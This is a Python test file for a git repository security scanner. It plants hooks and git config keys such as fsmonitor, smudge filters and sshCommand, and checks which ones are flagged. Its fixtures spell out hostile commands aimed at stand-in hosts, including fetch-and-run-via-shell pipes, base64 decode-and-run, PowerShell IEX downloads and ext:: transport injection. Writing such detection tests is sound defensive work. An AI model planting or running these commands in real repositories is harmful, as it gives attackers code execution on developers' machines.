#!/usr/bin/env python3
"""What git runs for a repository: legitimate tools stay unconfirmed, planted commands are caught,
and reading the configuration never runs it."""
from __future__ import annotations

import os
import stat
import uuid
from pathlib import Path
from unittest import mock

from stayawake.bots.security.matchers.git_exec_surface import (PAYLOAD_SIGNATURE, RUNS_SIGNATURE,
                                                               SUSPICIOUS_SIGNATURE)
from stayawake.bots.security.models import CONFIRMED, HEURISTIC, INFORMATIONAL
from stayawake.bots.security.scanner import scan_target
from stayawake.bots.security.signatures import load_signatures
from stayawake.bots.security.targets import ScanOptions
from stayawake.bots.security.targets.local import LocalRepoTarget
from stayawake.bots.security import hookscript
from tests.support.gitrepo import GitSandbox

LOADER = "global['_V'] = '8-st14';\n"
GIT_EXEC = {PAYLOAD_SIGNATURE, SUSPICIOUS_SIGNATURE, RUNS_SIGNATURE}


class ExecSurfaceSandbox(GitSandbox):
    """Build a committed repository, then plant configuration and hooks by writing files, so no
    git command runs after the plant."""

    def repo(self, name: str = "repo") -> Path:
        repo = self.new_repo(name)
        self.write(repo, "README.md", "hello\n")
        self.commit(repo, "init")
        return repo

    def append_config(self, repo: Path, text: str, rel: str = ".git/config") -> None:
        path = repo / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        with open(path, "a", encoding="utf-8") as fh:
            fh.write(text)

    def hook(self, directory: Path, name: str, text: str) -> Path:
        directory.mkdir(parents=True, exist_ok=True)
        path = directory / name
        path.write_text(text, encoding="utf-8")
        path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
        return path

    def scan(self, repo: Path):
        return scan_target(LocalRepoTarget(repo, str(repo), ScanOptions()), load_signatures(), [])

    def graded(self, repo: Path) -> dict[str, list]:
        result = self.scan(repo)
        tiers = {CONFIRMED: [], HEURISTIC: [], INFORMATIONAL: []}
        for f in result.findings + result.informational:
            if f.signature_id in GIT_EXEC:
                tiers[f.confidence].append(f)
        tiers["result"] = result
        return tiers


_LFS_HOOK = ('#!/bin/sh\ncommand -v git-lfs >/dev/null 2>&1 || { printf >&2 "\\n%s\\n\\n" '
             '"This repository is configured for Git LFS but \'git-lfs\' was not found on your '
             'path."; exit 2; }\ngit lfs {name} "$@"\n')
_PRE_COMMIT_HOOK = """#!/usr/bin/env bash
# File generated by pre-commit: https://pre-commit.com
# ID: 138fd403232d2ddd5efb44317e38bf03

# start templated
INSTALL_PYTHON=/usr/bin/python3
ARGS=(hook-impl --config=.pre-commit-config.yaml --hook-type=pre-commit)
# end templated

HERE="$(cd "$(dirname "$0")" && pwd)"
ARGS+=(--hook-dir "$HERE" -- "$@")

if [ -x "$INSTALL_PYTHON" ]; then
    exec "$INSTALL_PYTHON" -mpre_commit "${ARGS[@]}"
elif command -v pre-commit > /dev/null; then
    exec pre-commit "${ARGS[@]}"
else
    echo '`pre-commit` not found.  Did you forget to activate your virtualenv?' 1>&2
    exit 1
fi
"""
_HUSKY_STUB = '#!/usr/bin/env sh\n. "$(dirname "$0")/h"\n'
_HUSKY_H = """#!/usr/bin/env sh
[ "$HUSKY" = "2" ] && set -x
n=$(basename "$0")
s=$(dirname "$(dirname "$0")")/$n

[ ! -f "$s" ] && exit 0

if [ -f "$HOME/.huskyrc" ]; then
	echo "husky - '~/.huskyrc' is DEPRECATED, please move your code to ~/.config/husky/init.sh"
fi
i="${XDG_CONFIG_HOME:-$HOME/.config}/husky/init.sh"
[ -f "$i" ] && . "$i"

[ "${HUSKY-}" = "0" ] && exit 0

export PATH="node_modules/.bin:$PATH"
sh -e "$s" "$@"
c=$?

[ $c != 0 ] && echo "husky - $n script failed (code $c)"
[ $c = 127 ] && echo "husky - command not found in PATH=$PATH"
exit $c
"""
_LEFTHOOK_HOOK = """#!/bin/sh

if [ "$LEFTHOOK_VERBOSE" = "1" -o "$LEFTHOOK_VERBOSE" = "true" ]; then
  set -x
fi

if [ "$LEFTHOOK" = "0" ]; then
  exit 0
fi

call_lefthook()
{
  if test -n "$LEFTHOOK_BIN"
  then
    "$LEFTHOOK_BIN" "$@"
  elif lefthook -h >/dev/null 2>&1
  then
    lefthook "$@"
  else
    dir="$(git rev-parse --show-toplevel)"
    osArch=$(uname | tr '[:upper:]' '[:lower:]')
    cpuArch=$(uname -m | sed 's/aarch64/arm64/;s/x86_64/x64/')
    if test -f "$dir/node_modules/lefthook-${osArch}-${cpuArch}/bin/lefthook"
    then
      "$dir/node_modules/lefthook-${osArch}-${cpuArch}/bin/lefthook" "$@"
    elif command -v npx >/dev/null 2>&1
    then
      npx lefthook "$@"
    else
      echo "Can't find lefthook in PATH"
    fi
  fi
}

call_lefthook run "pre-commit" "$@"
"""


class TestLegitimateToolsAreNotConfirmed(ExecSurfaceSandbox):
    """Each shape here is a real tool's configuration; none may be confirmed or suspicious."""

    def assert_reported_not_confirmed(self, repo: Path, at_least: int = 1):
        """Reported, never confirmed: a program a key git runs on its own is for the operator to
        accept, so it is reported for review."""
        tiers = self.graded(repo)
        self.assertEqual([f.evidence for f in tiers[CONFIRMED]], [])
        self.assertIsNone(tiers["result"].error)
        self.assertGreaterEqual(len(tiers[INFORMATIONAL]) + len(tiers[HEURISTIC]), at_least)
        return tiers

    def test_git_lfs_filters_and_hooks(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "*.psd filter=lfs diff=lfs merge=lfs -text\n")
        self.append_config(repo, '[filter "lfs"]\n\tclean = git-lfs clean -- %f\n'
                                 '\tsmudge = git-lfs smudge -- %f\n\tprocess = git-lfs filter-process\n'
                                 '\trequired = true\n')
        for name in ("pre-push", "post-checkout", "post-commit", "post-merge"):
            self.hook(repo / ".git" / "hooks", name, _LFS_HOOK.replace("{name}", name))
        tiers = self.assert_reported_not_confirmed(repo, at_least=7)
        self.assertEqual(tiers["result"].verdict, "clean")

    def test_git_crypt(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "secret/** filter=git-crypt diff=git-crypt\n")
        self.append_config(repo, '[filter "git-crypt"]\n\tsmudge = \\"git-crypt\\" smudge\n'
                                 '\tclean = \\"git-crypt\\" clean\n\trequired = true\n'
                                 '[diff "git-crypt"]\n\ttextconv = \\"git-crypt\\" diff\n')
        self.assert_reported_not_confirmed(repo, at_least=3)

    def test_pre_commit_framework_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _PRE_COMMIT_HOOK)
        self.assert_reported_not_confirmed(repo)

    def test_husky_v9(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".husky" / "_", "pre-commit", _HUSKY_STUB)
        self.hook(repo / ".husky" / "_", "h", _HUSKY_H)
        self.write(repo, ".husky/pre-commit", "npm test\n")
        self.assert_reported_not_confirmed(repo, at_least=2)

    def test_lefthook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _LEFTHOOK_HOOK)
        self.assert_reported_not_confirmed(repo)

    def test_nbstripout(self):
        repo = self.repo()
        self.write(repo, ".git/info/attributes", "*.ipynb filter=nbstripout\n*.zpln filter=nbstripout\n"
                                                 "*.ipynb diff=ipynb\n")
        self.append_config(repo, '[filter "nbstripout"]\n\tclean = \\"/usr/bin/python3\\" -m nbstripout\n'
                                 '\tsmudge = cat\n[diff "ipynb"]\n'
                                 '\ttextconv = \\"/usr/bin/python3\\" -m nbstripout -t\n')
        self.assert_reported_not_confirmed(repo, at_least=3)

    def test_textconv_for_pdf_exif_sqlite(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "*.pdf diff=pdf\n*.jpg diff=exif\n*.db diff=sqlite3\n")
        self.append_config(repo, '[diff "pdf"]\n\ttextconv = pdftotext -layout\n'
                                 '[diff "exif"]\n\ttextconv = exiftool\n')
        self.assert_reported_not_confirmed(repo, at_least=2)

    def test_a_shell_recipe_is_suspicious_at_most(self):
        repo = self.repo()
        self.append_config(repo, '[diff "sqlite3"]\n\ttextconv = "echo .dump | sqlite3"\n'
                                 '[diff "zip"]\n\ttextconv = sh -c \'unzip -p "$0"\'\n'
                                 '[filter "dater"]\n\tclean = perl -pe \'s/x/y/\'\n')
        tiers = self.graded(repo)
        self.assertEqual([f.evidence for f in tiers[CONFIRMED]], [])
        self.assertEqual(3, len(tiers[HEURISTIC]))

    def test_watchman_and_rs_git_fsmonitor(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "query-watchman",
                  "#!/usr/bin/perl\nuse strict;\nuse warnings;\nmy ($version, $time) = @ARGV;\n")
        self.append_config(repo, "[core]\n\tfsmonitor = .git/hooks/query-watchman\n")
        self.assert_reported_not_confirmed(repo)
        other = self.repo("other")
        self.append_config(other, "[core]\n\tfsmonitor = rs-git-fsmonitor\n")
        self.assert_reported_not_confirmed(other)

    def test_ssh_command_credential_helper_and_a_relative_include(self):
        repo = self.repo()
        self.write(repo, ".gitconfig", "[user]\n\tname = Someone\n")
        self.append_config(repo, '[core]\n\tsshCommand = ssh -i ~/.ssh/work\n'
                                 '[credential]\n\thelper = osxkeychain\n'
                                 '[include]\n\tpath = ../.gitconfig\n')
        self.assert_reported_not_confirmed(repo, at_least=2)

    def test_a_driver_no_attribute_selects_is_listed(self):
        repo = self.repo()
        self.append_config(repo, '[filter "unused"]\n\tsmudge = some-tool\n')
        self.assertEqual(["filter.unused.smudge = some-tool"],
                         [f.evidence for f in self.graded(repo)[HEURISTIC]])

    def test_a_credential_helper_that_asks_a_vault_is_not_confirmed(self):
        repo = self.repo()
        self.append_config(repo, "[credential]\n\thelper = \"!f() { echo password=$(curl -s "
                                 "https://vault.example/token); }; f\"\n")
        self.assertEqual([f.evidence for f in self.graded(repo)[CONFIRMED]], [])

    def test_a_pristine_saw_hook_is_omitted(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-checkout",
                  hookscript.render("post-checkout", "/usr/local/bin/saw", None))
        self.assertEqual(self.graded(repo)[INFORMATIONAL], [])


class TestPlantedCommandsAreCaught(ExecSurfaceSandbox):

    def assert_tier(self, repo: Path, tier: str):
        tiers = self.graded(repo)
        self.assertTrue(tiers[tier], f"expected a {tier} git-exec finding; got "
                        f"{[(f.signature_id, f.evidence) for t in (CONFIRMED, HEURISTIC, INFORMATIONAL) for f in tiers[t]]}")
        return tiers

    def test_fsmonitor_inline_node(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = node -e \\\"require('child_process')"
                                 ".exec('id')\\\"\n")
        self.assert_tier(repo, HEURISTIC)

    def test_fsmonitor_inline_node_that_decodes_and_runs(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = node -e \\\"eval(Buffer.from('aWQ=',"
                                 "'base64').toString())\\\"\n")
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers["result"].verdict, "infected")

    def test_fsmonitor_fetch_to_shell(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = curl -s https://example.invalid/x | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_command_carrying_a_payload_fingerprint(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\teditor = node -e \\\"global['_V']='8-st14'\\\"\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_hook_that_fetches_and_runs(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-merge",
                  "#!/bin/sh\ncurl -fsSL https://example.invalid/i | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_hooks_path_in_scratch(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = /tmp/.x\n")
        self.assert_tier(repo, HEURISTIC)

    def test_loader_appended_to_a_husky_hook(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".husky" / "_", "pre-commit", _HUSKY_STUB + LOADER)
        self.assert_tier(repo, CONFIRMED)

    def test_loader_appended_to_a_pre_commit_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _PRE_COMMIT_HOOK + LOADER)
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers[CONFIRMED][0].payload_paths, (".git/hooks/pre-commit",))

    def test_loader_in_a_hook_outside_the_directory_hooks_run_from(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".git" / "hooks", "post-checkout", LOADER)
        self.assert_tier(repo, CONFIRMED)

    def test_smudge_filter_runs_a_payload_hidden_in_objects(self):
        repo = self.repo()
        (repo / ".git" / "objects" / ".x.js").write_text(LOADER, encoding="utf-8")
        self.write(repo, ".git/info/attributes", "* filter=x\n")
        self.append_config(repo, '[filter "x"]\n\tsmudge = node .git/objects/.x.js\n')
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers[CONFIRMED][0].payload_paths, (".git/objects/.x.js",))

    def test_smudge_filter_running_a_file_inside_the_git_directory(self):
        repo = self.repo()
        (repo / ".git" / "objects" / ".x.js").write_text("console.log(1)\n", encoding="utf-8")
        self.write(repo, ".git/info/attributes", "* filter=x\n")
        self.append_config(repo, '[filter "x"]\n\tsmudge = node .git/objects/.x.js\n')
        self.assert_tier(repo, HEURISTIC)

    def test_ext_transport_rewrite(self):
        repo = self.repo()
        self.append_config(repo, '[url "ext::sh -c touch% /tmp/pwned"]\n\tinsteadOf = https://\n')
        self.assert_tier(repo, HEURISTIC)
        other = self.repo("other")
        self.append_config(other, "[protocol \"ext\"]\n\tallow = always\n")
        self.assert_tier(other, HEURISTIC)

    def test_include_from_scratch_setting_the_pager(self):
        planted = Path("/tmp") / f"saw-test-{uuid.uuid4().hex}.cfg"
        planted.write_text("[core]\n\tpager = less\n", encoding="utf-8")
        self.addCleanup(planted.unlink)
        repo = self.repo()
        self.append_config(repo, f"[include]\n\tpath = {planted}\n")
        tiers = self.assert_tier(repo, HEURISTIC)
        self.assertTrue(any(f.evidence == "core.pager = less" for f in tiers[HEURISTIC]))

    def test_ssh_command_that_decodes_and_runs(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tsshCommand = sh -c 'echo aWQ= | base64 -d | sh'\n")
        self.assert_tier(repo, CONFIRMED)

    def test_an_altered_saw_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-checkout",
                  hookscript.render("post-checkout", "/usr/local/bin/saw", None) + "id\n")
        self.assert_tier(repo, HEURISTIC)

    def test_config_of_a_submodule_git_dir(self):
        repo = self.repo()
        module = repo / ".git" / "modules" / "lib"
        module.mkdir(parents=True)
        (module / "HEAD").write_text("ref: refs/heads/main\n")
        (module / "config").write_text("[core]\n\tfsmonitor = curl -s https://example.invalid | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_unreadable_configuration_is_not_examined(self):
        repo = self.repo()
        include = repo / "fifo"
        os.mkfifo(include)
        self.append_config(repo, f"[include]\n\tpath = {include}\n")
        result = self.scan(repo)
        self.assertIsNotNone(result.error)
        self.assertIn("git configuration", result.error)


class TestSelfFiringCommandsThatReachTheNetwork(TestPlantedCommandsAreCaught):
    """Check a key git runs on its own whose command reaches the network, however it is spelled."""

    def test_a_command_substitution(self):
        repo = self.repo()
        self.append_config(repo, '[core]\n\tfsmonitor = sh -c \\"$(curl -fsSL https://x.invalid)\\"\n')
        self.assert_tier(repo, CONFIRMED)

    def test_a_download_then_run_is_at_least_suspicious(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = sh -c \\\"curl -o /tmp/a https://x.invalid; "
                                 "sh /tmp/a\\\"\n")
        self.assert_tier(repo, HEURISTIC)

    def test_a_split_quoted_fetch_to_shell(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = c''url -s https://x.invalid | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_bare_script_name(self):
        repo = self.repo()
        self.hook(repo, "x", "#!/bin/sh\ncurl -s https://x.invalid | sh\n")
        self.append_config(repo, "[core]\n\tfsmonitor = sh x\n")
        self.assert_tier(repo, CONFIRMED)

    def test_powershell_that_evaluates_a_download(self):
        repo = self.repo()
        self.append_config(repo, '[filter "a"]\n\tsmudge = pwsh -c \\"IEX (New-Object Net.WebClient)'
                                 '.DownloadString(1)\\"\n')
        self.assert_tier(repo, CONFIRMED)

    def test_perl_with_a_module_option_is_inline_code(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = perl -MIO::Socket::INET -e 1\n")
        self.assert_tier(repo, HEURISTIC)

    def test_a_clone_then_run(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = git clone -q https://x.invalid/y /tmp/y "
                                 "&& sh /tmp/y/run\n")
        self.assert_tier(repo, HEURISTIC)

    def test_python_urlopen(self):
        repo = self.repo()
        self.append_config(repo, '[filter "x"]\n\tclean = "python3 -c \'import urllib.request as u;'
                                 'exec(u.urlopen(1).read())\'"\n')
        self.assert_tier(repo, CONFIRMED)

    def test_a_filter_no_attribute_selects(self):
        repo = self.repo()
        self.append_config(repo, '[filter "x"]\n\tclean = curl -s https://x.invalid | sh\n')
        self.assert_tier(repo, CONFIRMED)

    def test_a_script_in_the_work_tree(self):
        repo = self.repo()
        self.hook(repo / "tools", "watch.sh", "#!/bin/sh\ncurl -s https://x.invalid | sh\n")
        self.append_config(repo, "[core]\n\tfsmonitor = sh tools/watch.sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_the_default_ssh_key_command(self):
        repo = self.repo()
        self.append_config(repo, '[gpg "ssh"]\n\tdefaultKeyCommand = curl -s https://x.invalid | sh\n')
        self.assert_tier(repo, CONFIRMED)

    def test_a_remote_address_that_is_a_command(self):
        repo = self.repo()
        self.append_config(repo, '[remote "origin"]\n\turl = "ext::sh -c curl% -s% https://x.invalid|sh"\n')
        self.assert_tier(repo, CONFIRMED)


class TestOrdinaryCodeNearASelfFiringKeyIsNotConfirmed(ExecSurfaceSandbox):
    """Check programs a self-firing key runs whose text merely mentions network words."""

    def assert_not_confirmed(self, repo: Path):
        self.assertEqual([f.evidence for f in self.graded(repo)[CONFIRMED]], [])

    def test_a_textconv_script_with_ordinary_names(self):
        repo = self.repo()
        self.hook(repo / "scripts", "prettyjson", "#!/usr/bin/env node\nconst nc = 2;\n"
                                                  "// http.get( is not called\ncache.fetch( 'key' );\n")
        self.append_config(repo, '[diff "json"]\n\ttextconv = scripts/prettyjson\n')
        self.assert_not_confirmed(repo)

    def test_a_filter_option_that_looks_like_a_tool(self):
        repo = self.repo()
        self.append_config(repo, '[filter "x"]\n\tclean = dotnet run --project tools/Filter -- nc-mode\n')
        self.assert_not_confirmed(repo)

    def test_a_compiled_program(self):
        repo = self.repo()
        binary = repo / "tools" / "kw"
        binary.parent.mkdir(parents=True)
        binary.write_bytes(b"\x7fELF\0\0NC curl | sh IWR\0")
        binary.chmod(0o755)
        self.append_config(repo, '[filter "kw"]\n\tsmudge = tools/kw\n')
        self.assert_not_confirmed(repo)


class TestEveryProgramASelfFiringKeyRunsIsReported(ExecSurfaceSandbox):
    """Check that nothing a key git runs on its own is left unreported."""

    VALUES = {"a": "timeout -s KILL 9 bash -c id", "b": "sudo -u root sh -c id",
              "c": "env -S 'sh -c id'", "d": "node --eval 1", "e": "php -R 1",
              "f": "sh$IFS-c$IFS'id'", "g": "tcsh -c id", "h": "script -qc id /dev/null",
              "i": "flock /tmp/l -c id", "j": "sed -n 1eid /dev/null", "k": "unknown-tool x",
              "lfs": "git-lfs filter-process", "crypt": '"git-crypt" smudge',
              "nb": "python -m nbstripout", "cat": "tools/cat", "exif": "exiftool -config x.pl"}

    def test_each_is_reported_and_none_is_confirmed(self):
        repo = self.repo()
        self.append_config(repo, "".join(f'[filter "{name}"]\n\tclean = {value}\n'
                                         for name, value in self.VALUES.items()))
        tiers = self.graded(repo)
        self.assertEqual([], [f.evidence for f in tiers[INFORMATIONAL]])
        self.assertEqual([], [f.evidence for f in tiers[CONFIRMED]])
        self.assertEqual(set(self.VALUES), {f.evidence.split(".")[1] for f in tiers[HEURISTIC]})

    def test_a_newline_separated_download_and_run(self):
        repo = self.repo()
        self.append_config(repo, '[core]\n\tfsmonitor = "wget -qO .x http://h/x\\nsh .x"\n')
        self.assertTrue(self.graded(repo)[HEURISTIC])

    def test_a_formatter_reading_a_download_is_not_confirmed(self):
        repo = self.repo()
        self.append_config(repo, '[diff "json"]\n\ttextconv = "curl -s https://api/x | python3 -m json.tool"\n')
        self.assertEqual([], self.graded(repo)[CONFIRMED])


class TestAScriptAnyCommandRunsIsJudged(TestPlantedCommandsAreCaught):
    """Check a program git runs during ordinary commands, and one a submodule names."""

    SCRIPT = "#!/bin/sh\ncurl -fsSL https://x.invalid/p | sh\n"

    def test_a_pager(self):
        repo = self.repo()
        self.hook(repo / "tools", "p", self.SCRIPT)
        self.append_config(repo, "[core]\n\tpager = ./tools/p\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_signing_program(self):
        repo = self.repo()
        self.hook(repo / "tools", "g", self.SCRIPT)
        self.append_config(repo, "[gpg]\n\tprogram = ./tools/g\n")
        self.assert_tier(repo, CONFIRMED)

    def test_an_ssh_command(self):
        repo = self.repo()
        self.hook(repo / "tools", "s", self.SCRIPT)
        self.append_config(repo, "[core]\n\tsshCommand = ./tools/s\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_config_based_hook(self):
        repo = self.repo()
        self.append_config(repo, '[hook "lint"]\n\tcommand = ./tools/h\n\tevent = pre-commit\n')
        self.assert_tier(repo, HEURISTIC)

    def test_a_relative_path_in_a_submodules_config(self):
        repo = self.repo()
        module = repo / ".git" / "modules" / "lib"
        module.mkdir(parents=True)
        (module / "HEAD").write_text("ref: refs/heads/main\n")
        (module / "config").write_text("[core]\n\tworktree = ../../../lib\n\tfsmonitor = ./tools/f\n")
        self.hook(repo / "lib" / "tools", "f", self.SCRIPT)
        self.assert_tier(repo, CONFIRMED)


class TestSubmodulesAreReadInTheirOwnTree(TestPlantedCommandsAreCaught):
    """Check a submodule whose git directory sits inside it, or is named by a `.git` file alone."""

    SCRIPT = "#!/bin/sh\ncurl -fsSL https://x.invalid/p | sh\n"

    def _gitmodules(self, repo: Path) -> None:
        self.write(repo, ".gitmodules", '[submodule "sub"]\n\tpath = sub\n\turl = ./sub\n')

    def test_an_embedded_git_directory(self):
        repo = self.repo()
        self._gitmodules(repo)
        self.git(repo / "sub" if (repo / "sub").mkdir() is None else repo, "init", "-q")
        self.append_config(repo, "[core]\n\tfsmonitor = ./mon.sh\n", rel="sub/.git/config")
        self.hook(repo / "sub", "mon.sh", self.SCRIPT)
        self.assert_tier(repo, CONFIRMED)

    def test_a_git_file_without_a_configured_worktree(self):
        repo = self.repo()
        self._gitmodules(repo)
        module = repo / ".git" / "modules" / "sub"
        module.mkdir(parents=True)
        (module / "HEAD").write_text("ref: refs/heads/main\n")
        (module / "config").write_text("[core]\n\tfsmonitor = ./fetch.sh\n")
        (repo / "sub").mkdir()
        (repo / "sub" / ".git").write_text(f"gitdir: {module}\n")
        self.hook(repo / "sub", "fetch.sh", self.SCRIPT)
        self.assert_tier(repo, CONFIRMED)


class TestPowerShellWordsNeedPowerShell(ExecSurfaceSandbox):
    """Check `iex` outside PowerShell: a hostname, or Elixir's shell."""

    def test_none_is_confirmed(self):
        repo = self.repo()
        self.append_config(repo, "[alias]\n\tq = !curl -s https://sandbox.iex.cloud/stable/quote | jq .\n"
                                 "\tdev = !curl -sf localhost:4000/health && iex -S mix phx.server\n"
                                 "\tdep = !wget -q https://hex.pm/x.ez && iex -S mix\n")
        self.assertEqual([], [f.evidence for f in self.graded(repo)[CONFIRMED]])

    def test_a_download_piped_into_iex_is_confirmed(self):
        repo = self.repo()
        self.append_config(repo, "[alias]\n\tps = !pwsh -c \\\"irm https://x.invalid | iex\\\"\n")
        self.assertTrue(self.graded(repo)[CONFIRMED])


class TestAShellBuiltinIsNotAnEvaluator(ExecSurfaceSandbox):
    """Check shell `exec`, which replaces the process and evaluates nothing."""

    def test_exec_beside_a_fetch_word(self):
        repo = self.repo()
        self.append_config(repo, '[filter "y"]\n\tsmudge = "sh -c \'command -v curl >/dev/null || '
                                 'exec cat; exec my-smudge\'"\n'
                                 '[diff "x"]\n\ttextconv = "sh -c \'exec git-fetch-meta \\"$1\\"\' --"\n')
        self.assertEqual([], [f.evidence for f in self.graded(repo)[CONFIRMED]])


class TestTheOperatorAcceptsOneSettingExactly(ExecSurfaceSandbox):
    """Check an allowlist rule that names a finding's evidence."""

    def test_only_the_named_setting_is_accepted(self):
        repo = self.repo()
        self.append_config(repo, '[filter "git-crypt"]\n\tsmudge = "git-crypt" smudge\n'
                                 '[filter "other"]\n\tsmudge = git-crypt smudge\n')
        rule = {"signature": "git-exec-suspicious", "path_glob": ".git/config",
                "evidence": "filter.git-crypt.smudge = git-crypt smudge"}
        result = scan_target(LocalRepoTarget(repo, str(repo), ScanOptions()), load_signatures(),
                             [rule])
        left = [f.evidence for f in result.findings if f.signature_id == "git-exec-suspicious"]
        self.assertEqual(["filter.other.smudge = git-crypt smudge"], left)


class TestARepositoryInAScratchDirectoryIsItsOwn(ExecSurfaceSandbox):
    """Check a repository that itself lives under a shared scratch directory."""

    def test_its_own_hooks_directory_is_not_scratch(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        (repo / ".husky" / "_").mkdir(parents=True)
        from stayawake.bots.security.matchers import git_exec_surface
        with mock.patch.object(git_exec_surface, "_under_scratch", lambda path: True):
            tiers = self.graded(repo)
        self.assertEqual([f.evidence for f in tiers[HEURISTIC]], [])


class TestReadingNeverRunsTheConfiguration(ExecSurfaceSandbox):
    """Every key git executes is set to write a sentinel; a scan must leave no sentinel behind."""

    def test_a_scan_runs_nothing_the_repository_configures(self):
        repo = self.repo()
        sentinel = self.root / "ran"
        touch = f"touch {sentinel}"
        self.write(repo, ".git/info/attributes", "* filter=s diff=s merge=s\n")
        self.write(repo, ".gitattributes", "* filter=s diff=s merge=s\n")
        included = self.root / "included.cfg"
        included.write_text(f"[core]\n\tpager = {touch}\n\teditor = {touch}\n", encoding="utf-8")
        self.append_config(repo, (
            f"[core]\n\tfsmonitor = {touch}\n\tsshCommand = {touch}\n\taskPass = {touch}\n"
            f"\tgitProxy = {touch}\n"
            f'[filter "s"]\n\tclean = {touch}\n\tsmudge = {touch}\n\tprocess = {touch}\n'
            f"\trequired = true\n"
            f'[diff "s"]\n\ttextconv = {touch}\n\tcommand = {touch}\n'
            f"[diff]\n\texternal = {touch}\n"
            f'[merge "s"]\n\tdriver = {touch}\n'
            f"[credential]\n\thelper = !{touch}\n"
            f"[gpg]\n\tprogram = {touch}\n"
            f'[remote "origin"]\n\turl = /nonexistent\n\tuploadpack = {touch}\n'
            f"[include]\n\tpath = {included}\n"))
        from stayawake.lib.git.exec_surface import HOOK_NAMES
        for name in HOOK_NAMES:
            self.hook(repo / ".git" / "hooks", name, f"#!/bin/sh\n{touch}\n")
        tiers = self.graded(repo)
        self.assertFalse(sentinel.exists(), "reading the repository ran something it configures")
        self.assertTrue(tiers[INFORMATIONAL])


if __name__ == "__main__":
    import unittest
    unittest.main()
